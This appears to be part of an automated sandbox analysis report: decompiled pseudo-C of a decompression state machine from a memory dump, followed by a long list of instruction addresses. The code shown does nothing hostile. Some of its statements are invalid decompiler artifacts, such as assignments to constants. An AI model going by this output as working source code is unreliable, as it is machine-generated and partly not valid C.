												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                  0x00000000
                  0x00406b7b
                  0x00406b7b
                  0x00406b7f
                  0x00406b8c
                  0x00406b96
                  0x00000000
                  0x00406b81
                  0x00406b81
                  0x00406bbc
                  0x00406bbf
                  0x00406bc2
                  0x00406bc5
                  0x00406bc5
                  0x00406bc8
                  0x00406bcf
                  0x00406bd4
                  0x00406ab5
                  0x00406ab8
                  0x00406e2a
                  0x00406e2a
                  0x00406e2a
                  0x00406e2d
                  0x00406e2d
                  0x00406e2d
                  0x00406e33
                  0x00406e39
                  0x00406e3f
                  0x00406e59
                  0x00406e5c
                  0x00406e62
                  0x00406e6d
                  0x00406e6f
                  0x00406e41
                  0x00406e41
                  0x00406e50
                  0x00406e54
                  0x00406e54
                  0x00406e79
                  0x00000000
                  0x00000000
                  0x00406e7b
                  0x00406e7f
                  0x0040702e
                  0x00407044
                  0x0040704c
                  0x00407053
                  0x00407055
                  0x0040705c
                  0x00407060
                  0x00407060
                  0x00406e8b
                  0x00406e92
                  0x00406e9a
                  0x00406e9d
                  0x00406ea0
                  0x00406ea0
                  0x00406ea6
                  0x00406ea6
                  0x00406642
                  0x00406642
                  0x00406642
                  0x0040664b
                  0x00000000
                  0x00000000
                  0x00406651
                  0x00000000
                  0x0040665c
                  0x00000000
                  0x00000000
                  0x00406665
                  0x00406668
                  0x0040666b
                  0x0040666f
                  0x00000000
                  0x00000000
                  0x00406675
                  0x00406678
                  0x0040667a
                  0x0040667b
                  0x0040667e
                  0x00406680
                  0x00406681
                  0x00406683
                  0x00406686
                  0x0040668b
                  0x00406690
                  0x00406699
                  0x004066ac
                  0x004066af
                  0x004066bb
                  0x004066e3
                  0x004066e5
                  0x004066f3
                  0x004066f3
                  0x004066f7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066e7
                  0x004066e7
                  0x004066ea
                  0x004066eb
                  0x004066eb
                  0x00000000
                  0x004066e7
                  0x004066c1
                  0x004066c6
                  0x004066c6
                  0x004066cf
                  0x004066d7
                  0x004066da
                  0x00000000
                  0x004066e0
                  0x004066e0
                  0x00000000
                  0x004066e0
                  0x00000000
                  0x004066fd
                  0x004066fd
                  0x00406701
                  0x00406fad
                  0x00000000
                  0x00406fad
                  0x0040670a
                  0x0040671a
                  0x0040671d
                  0x00406720
                  0x00406720
                  0x00406720
                  0x00406723
                  0x00406727
                  0x00000000
                  0x00000000
                  0x00406729
                  0x0040672f
                  0x00406759
                  0x0040675f
                  0x00406766
                  0x00000000
                  0x00406766
                  0x00406735
                  0x00406738
                  0x0040673d
                  0x0040673d
                  0x00406748
                  0x00406750
                  0x00406753
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406798
                  0x0040679e
                  0x004067a1
                  0x004067ae
                  0x004067b6
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00000000
                  0x0040676d
                  0x0040676d
                  0x00406771
                  0x00406fbc
                  0x00000000
                  0x00406fbc
                  0x0040677d
                  0x00406788
                  0x00406788
                  0x00406788
                  0x0040678b
                  0x0040678e
                  0x00406791
                  0x00406796
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406e2d
                  0x00406e2d
                  0x00406e33
                  0x00406e39
                  0x00406e3f
                  0x00406e59
                  0x00406e5c
                  0x00406e62
                  0x00406e6d
                  0x00406e6f
                  0x00406e41
                  0x00406e41
                  0x00406e50
                  0x00406e54
                  0x00406e54
                  0x00406e79
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004067be
                  0x004067c0
                  0x004067c3
                  0x00406834
                  0x00406837
                  0x0040683a
                  0x00406841
                  0x0040684b
                  0x00406e2a
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00406e2a
                  0x004067c5
                  0x004067c9
                  0x004067cc
                  0x004067ce
                  0x004067d1
                  0x004067d4
                  0x004067d6
                  0x004067d9
                  0x004067db
                  0x004067e0
                  0x004067e3
                  0x004067e6
                  0x004067ea
                  0x004067f1
                  0x004067f4
                  0x004067fb
                  0x004067ff
                  0x00406807
                  0x00406807
                  0x00406807
                  0x00406801
                  0x00406801
                  0x00406801
                  0x004067f6
                  0x004067f6
                  0x004067f6
                  0x0040680b
                  0x0040680e
                  0x0040682c
                  0x0040682e
                  0x00000000
                  0x00406810
                  0x00406810
                  0x00406813
                  0x00406816
                  0x00406819
                  0x0040681b
                  0x0040681b
                  0x0040681b
                  0x0040681e
                  0x00406821
                  0x00406823
                  0x00406824
                  0x00406827
                  0x00000000
                  0x00406827
                  0x00000000
                  0x00406a5d
                  0x00406a61
                  0x00406a7f
                  0x00406a82
                  0x00406a89
                  0x00406a8c
                  0x00406a8f
                  0x00406a92
                  0x00406a95
                  0x00406a98
                  0x00406a9a
                  0x00406aa1
                  0x00406aa2
                  0x00406aa4
                  0x00406aa7
                  0x00406aaa
                  0x00406aad
                  0x00406aad
                  0x00406ab2
                  0x00000000
                  0x00406ab2
                  0x00406a63
                  0x00406a66
                  0x00406a69
                  0x00406a73
                  0x00406e2a
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00000000
                  0x00406ac7
                  0x00406acb
                  0x00406aee
                  0x00406af1
                  0x00406af4
                  0x00406afe
                  0x00406acd
                  0x00406acd
                  0x00406ad0
                  0x00406ad3
                  0x00406ad6
                  0x00406ae3
                  0x00406ae6
                  0x00406ae6
                  0x00406e2a
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00000000
                  0x00406b0a
                  0x00406b0e
                  0x00000000
                  0x00000000
                  0x00406b14
                  0x00406b18
                  0x00000000
                  0x00000000
                  0x00406b1e
                  0x00406b20
                  0x00406b24
                  0x00406b24
                  0x00406b27
                  0x00406b2b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406ba2
                  0x00406ba6
                  0x00406bad
                  0x00406bb0
                  0x00406bb3
                  0x00406ba8
                  0x00406ba8
                  0x00406ba8
                  0x00406bb6
                  0x00406bb9
                  0x00000000
                  0x00000000
                  0x00406c62
                  0x00406c62
                  0x00406c66
                  0x00407004
                  0x00000000
                  0x00407004
                  0x00406c6c
                  0x00406c6f
                  0x00406c72
                  0x00406c76
                  0x00406c79
                  0x00406c7f
                  0x00406c81
                  0x00406c81
                  0x00406c81
                  0x00406c84
                  0x00406c87
                  0x00000000
                  0x00000000
                  0x00406857
                  0x00406857
                  0x0040685b
                  0x00406fc8
                  0x00000000
                  0x00406fc8
                  0x00406861
                  0x00406864
                  0x00406867
                  0x0040686b
                  0x0040686e
                  0x00406874
                  0x00406876
                  0x00406876
                  0x00406876
                  0x00406879
                  0x0040687c
                  0x0040687c
                  0x0040687f
                  0x00406882
                  0x00000000
                  0x00000000
                  0x00406888
                  0x0040688e
                  0x00000000
                  0x00000000
                  0x00406894
                  0x00406894
                  0x00406898
                  0x0040689b
                  0x0040689e
                  0x004068a1
                  0x004068a4
                  0x004068a5
                  0x004068a8
                  0x004068aa
                  0x004068b0
                  0x004068b3
                  0x004068b6
                  0x004068b9
                  0x004068bc
                  0x004068bf
                  0x004068c2
                  0x004068de
                  0x004068e1
                  0x004068e4
                  0x004068e7
                  0x004068ee
                  0x004068f2
                  0x004068f4
                  0x004068f8
                  0x004068c4
                  0x004068c4
                  0x004068c8
                  0x004068d0
                  0x004068d5
                  0x004068d7
                  0x004068d9
                  0x004068d9
                  0x004068fb
                  0x00406902
                  0x00406905
                  0x00000000
                  0x0040690b
                  0x00000000
                  0x0040690b
                  0x00000000
                  0x00406910
                  0x00406910
                  0x00406914
                  0x00406fd4
                  0x00000000
                  0x00406fd4
                  0x0040691a
                  0x0040691d
                  0x00406920
                  0x00406924
                  0x00406927
                  0x0040692d
                  0x0040692f
                  0x0040692f
                  0x0040692f
                  0x00406932
                  0x00406935
                  0x00406935
                  0x00406935
                  0x0040693b
                  0x00000000
                  0x00000000
                  0x0040693d
                  0x00406940
                  0x00406943
                  0x00406946
                  0x00406949
                  0x0040694c
                  0x0040694f
                  0x00406952
                  0x00406955
                  0x00406958
                  0x0040695b
                  0x00406973
                  0x00406976
                  0x00406979
                  0x0040697c
                  0x0040697c
                  0x0040697f
                  0x00406983
                  0x00406985
                  0x0040695d
                  0x0040695d
                  0x00406965
                  0x0040696a
                  0x0040696c
                  0x0040696e
                  0x0040696e
                  0x00406988
                  0x0040698f
                  0x00406992
                  0x00000000
                  0x00406994
                  0x00000000
                  0x00406994
                  0x00406992
                  0x00406999
                  0x00406999
                  0x00406999
                  0x00406999
                  0x00000000
                  0x00000000
                  0x004069d4
                  0x004069d4
                  0x004069d8
                  0x00406fe0
                  0x00000000
                  0x00406fe0
                  0x004069de
                  0x004069e1
                  0x004069e4
                  0x004069e8
                  0x004069eb
                  0x004069f1
                  0x004069f3
                  0x004069f3
                  0x004069f3
                  0x004069f6
                  0x004069f9
                  0x004069f9
                  0x004069ff
                  0x0040699d
                  0x0040699d
                  0x004069a0
                  0x00000000
                  0x004069a0
                  0x00406a01
                  0x00406a01
                  0x00406a04
                  0x00406a07
                  0x00406a0a
                  0x00406a0d
                  0x00406a10
                  0x00406a13
                  0x00406a16
                  0x00406a19
                  0x00406a1c
                  0x00406a1f
                  0x00406a37
                  0x00406a3a
                  0x00406a3d
                  0x00406a40
                  0x00406a40
                  0x00406a43
                  0x00406a47
                  0x00406a49
                  0x00406a21
                  0x00406a21
                  0x00406a29
                  0x00406a2e
                  0x00406a30
                  0x00406a32
                  0x00406a32
                  0x00406a4c
                  0x00406a53
                  0x00406a56
                  0x00000000
                  0x00406a58
                  0x00000000
                  0x00406a58
                  0x00000000
                  0x00406ce5
                  0x00406ce5
                  0x00406ce9
                  0x00407010
                  0x00000000
                  0x00407010
                  0x00406cef
                  0x00406cf2
                  0x00406cf5
                  0x00406cf9
                  0x00406cfc
                  0x00406d02
                  0x00406d04
                  0x00406d04
                  0x00406d04
                  0x00406d07
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406df4
                  0x00406df8
                  0x00406e1a
                  0x00406e1d
                  0x00406e27
                  0x00406e2a
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00406e2a
                  0x00406dfa
                  0x00406dfd
                  0x00406e01
                  0x00406e04
                  0x00406e04
                  0x00406e07
                  0x00000000
                  0x00000000
                  0x00406eb1
                  0x00406eb5
                  0x00406ed3
                  0x00406ed3
                  0x00406ed3
                  0x00406eda
                  0x00406ee1
                  0x00406ee8
                  0x00406ee8
                  0x00000000
                  0x00406ee8
                  0x00406eb7
                  0x00406eba
                  0x00406ebd
                  0x00406ec0
                  0x00406ec7
                  0x00406e0b
                  0x00406e0b
                  0x00406e0e
                  0x00000000
                  0x00000000
                  0x00406fa2
                  0x00406fa5
                  0x00406ea6
                  0x00000000
                  0x00000000
                  0x00406bdc
                  0x00406bde
                  0x00406be5
                  0x00406be6
                  0x00406be8
                  0x00406beb
                  0x00000000
                  0x00000000
                  0x00406bf3
                  0x00406bf6
                  0x00406bf9
                  0x00406bfb
                  0x00406bfd
                  0x00406bfd
                  0x00406bfe
                  0x00406c01
                  0x00406c08
                  0x00406c0b
                  0x00406c19
                  0x00000000
                  0x00000000
                  0x00406eef
                  0x00406eef
                  0x00406ef2
                  0x00406ef9
                  0x00000000
                  0x00000000
                  0x00406efe
                  0x00406efe
                  0x00406f02
                  0x0040703a
                  0x00000000
                  0x0040703a
                  0x00406f08
                  0x00406f0b
                  0x00406f0e
                  0x00406f12
                  0x00406f15
                  0x00406f1b
                  0x00406f1d
                  0x00406f1d
                  0x00406f1d
                  0x00406f20
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00406f26
                  0x00406f26
                  0x00406f2a
                  0x00406f8a
                  0x00406f8d
                  0x00406f92
                  0x00406f93
                  0x00406f95
                  0x00406f97
                  0x00406f9a
                  0x00406ea6
                  0x00406ea6
                  0x00000000
                  0x00406eac
                  0x00406ea6
                  0x00406f2c
                  0x00406f32
                  0x00406f35
                  0x00406f38
                  0x00406f3b
                  0x00406f3e
                  0x00406f41
                  0x00406f44
                  0x00406f47
                  0x00406f4a
                  0x00406f4d
                  0x00406f66
                  0x00406f69
                  0x00406f6c
                  0x00406f6f
                  0x00406f73
                  0x00406f75
                  0x00406f75
                  0x00406f76
                  0x00406f79
                  0x00406f4f
                  0x00406f4f
                  0x00406f57
                  0x00406f5c
                  0x00406f5e
                  0x00406f61
                  0x00406f61
                  0x00406f7c
                  0x00406f83
                  0x00000000
                  0x00406f85
                  0x00000000
                  0x00406f85
                  0x00000000
                  0x00406c21
                  0x00406c24
                  0x00406c5a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8d
                  0x00406d8d
                  0x00406d90
                  0x00406d92
                  0x0040701c
                  0x00000000
                  0x0040701c
                  0x00406d98
                  0x00406d9b
                  0x00000000
                  0x00000000
                  0x00406da1
                  0x00406da5
                  0x00406da8
                  0x00406da8
                  0x00406da8
                  0x00000000
                  0x00406da8
                  0x00406c26
                  0x00406c28
                  0x00406c2a
                  0x00406c2c
                  0x00406c2f
                  0x00406c30
                  0x00406c32
                  0x00406c34
                  0x00406c37
                  0x00406c3a
                  0x00406c50
                  0x00406c55
                  0x00406c8d
                  0x00406c8d
                  0x00406c91
                  0x00406cbd
                  0x00406cbf
                  0x00406cc6
                  0x00406cc9
                  0x00406ccc
                  0x00406ccc
                  0x00406cd1
                  0x00406cd1
                  0x00406cd3
                  0x00406cd6
                  0x00406cdd
                  0x00406ce0
                  0x00406d0d
                  0x00406d0d
                  0x00406d10
                  0x00406d13
                  0x00406d87
                  0x00406d87
                  0x00406d87
                  0x00000000
                  0x00406d87
                  0x00406d15
                  0x00406d1b
                  0x00406d1e
                  0x00406d21
                  0x00406d24
                  0x00406d27
                  0x00406d2a
                  0x00406d2d
                  0x00406d30
                  0x00406d33
                  0x00406d36
                  0x00406d4f
                  0x00406d51
                  0x00406d54
                  0x00406d55
                  0x00406d58
                  0x00406d5a
                  0x00406d5d
                  0x00406d5f
                  0x00406d61
                  0x00406d64
                  0x00406d66
                  0x00406d69
                  0x00406d6d
                  0x00406d6f
                  0x00406d6f
                  0x00406d70
                  0x00406d73
                  0x00406d76
                  0x00406d38
                  0x00406d38
                  0x00406d40
                  0x00406d45
                  0x00406d47
                  0x00406d4a
                  0x00406d4a
                  0x00406d79
                  0x00406d80
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00000000
                  0x00406d82
                  0x00000000
                  0x00406d82
                  0x00406d80
                  0x00406c93
                  0x00406c96
                  0x00406c98
                  0x00406c9b
                  0x00406c9e
                  0x00406ca1
                  0x00406ca3
                  0x00406ca6
                  0x00406ca9
                  0x00406ca9
                  0x00406cac
                  0x00406cac
                  0x00406caf
                  0x00406cb6
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00000000
                  0x00406cb8
                  0x00000000
                  0x00406cb8
                  0x00406cb6
                  0x00406c3c
                  0x00406c3f
                  0x00406c41
                  0x00406c44
                  0x00000000
                  0x00000000
                  0x004069a3
                  0x004069a3
                  0x004069a7
                  0x00406fec
                  0x00000000
                  0x00406fec
                  0x004069ad
                  0x004069b0
                  0x004069b3
                  0x004069b6
                  0x004069b9
                  0x004069bc
                  0x004069bf
                  0x004069c1
                  0x004069c4
                  0x004069c7
                  0x004069ca
                  0x004069cc
                  0x004069cc
                  0x004069cc
                  0x00000000
                  0x00000000
                  0x00406b2e
                  0x00406b2e
                  0x00406b32
                  0x00406ff8
                  0x00000000
                  0x00406ff8
                  0x00406b38
                  0x00406b3b
                  0x00406b3e
                  0x00406b41
                  0x00406b43
                  0x00406b43
                  0x00406b43
                  0x00406b46
                  0x00406b49
                  0x00406b4c
                  0x00406b4f
                  0x00406b52
                  0x00406b55
                  0x00406b56
                  0x00406b58
                  0x00406b58
                  0x00406b58
                  0x00406b5b
                  0x00406b5e
                  0x00406b61
                  0x00406b64
                  0x00406b64
                  0x00406b64
                  0x00406b67
                  0x00406b69
                  0x00406b69
                  0x00000000
                  0x00000000
                  0x00406dab
                  0x00406dab
                  0x00406dab
                  0x00406daf
                  0x00000000
                  0x00000000
                  0x00406db5
                  0x00406db8
                  0x00406dbb
                  0x00406dbe
                  0x00406dc0
                  0x00406dc0
                  0x00406dc0
                  0x00406dc3
                  0x00406dc6
                  0x00406dc9
                  0x00406dcc
                  0x00406dcf
                  0x00406dd2
                  0x00406dd3
                  0x00406dd5
                  0x00406dd5
                  0x00406dd5
                  0x00406dd8
                  0x00406ddb
                  0x00406dde
                  0x00406de1
                  0x00406de4
                  0x00406de8
                  0x00406dea
                  0x00406ded
                  0x00000000
                  0x00406def
                  0x00406b6c
                  0x00406b6c
                  0x00000000
                  0x00406b6c
                  0x00406ded
                  0x00407022
                  0x00000000
                  0x00000000
                  0x00406651
                  0x00407059
                  0x00407059
                  0x00000000
                  0x00407059
                  0x00406ea6
                  0x00406e2d
                  0x00406e2a
                  0x00000000
                  0x00406b7f

                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
